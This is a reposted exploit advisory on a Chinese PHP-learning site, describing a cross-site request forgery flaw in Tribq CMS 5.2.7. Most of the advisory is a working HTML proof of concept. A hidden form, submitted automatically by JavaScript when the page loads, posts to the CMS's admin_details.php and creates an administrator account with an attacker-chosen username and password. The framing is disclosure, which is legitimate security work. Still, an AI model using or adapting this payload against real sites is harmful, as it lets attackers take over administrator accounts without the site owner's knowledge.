来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] # 标题: Tribq CMS CSRF - Adding/Editing new administrator account # 发现者: Yashar shahinzadeh# 开发商: http://sourceforge.net/projects/tribiq/# 测试平台: Linux Windows, PHP ......
# 标题: Tribq CMS CSRF - Adding/Editing new administrator account # 发现者: Yashar shahinzadeh # 开发商: http://sourceforge.net/projects/tribiq/ # 测试平台: Linux & Windows, PHP 5.2.9 # 影响版本 : 5.2.7 摘要: ======== 1. CSRF - Adding administrator account 1. CSRF - Adding administrator account: ======================================= From my standpoint, Tribq is a good CMS which is immune to many well-known vulnerabilities aside from CSRF. There are too many devastating actions may be done by hacker by conducting CSRF attack, although the critical ones are changing administrator password or adding new one. I provide an example of adding new administrator account, the attack can be done easily, afterwards, such a plain text may be appeared: {"adminId":20,"adminType":"local"} <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http:// www.2cto.com /community-5.2.7c/community-5.2.7c/tb/ajax/admin_details.php" method="post"> <input type="hidden" name="save" value="true"> <input type="hidden" name="adminType" value="local"> <input type="hidden" name="formMode" value="edit"> <input type="hidden" name="username" value="Yashar"> <input type="hidden" name="password" value="Yashar123"> <input type="hidden" name="password_reconfirm" value="Yashar123"> <input type="hidden" name="first_name" value="test"> <input type="hidden" name="last_name" value="test"> <input type="hidden" name="email" value="test@test.com"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> /** Yasshar shahinzadeh **/
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
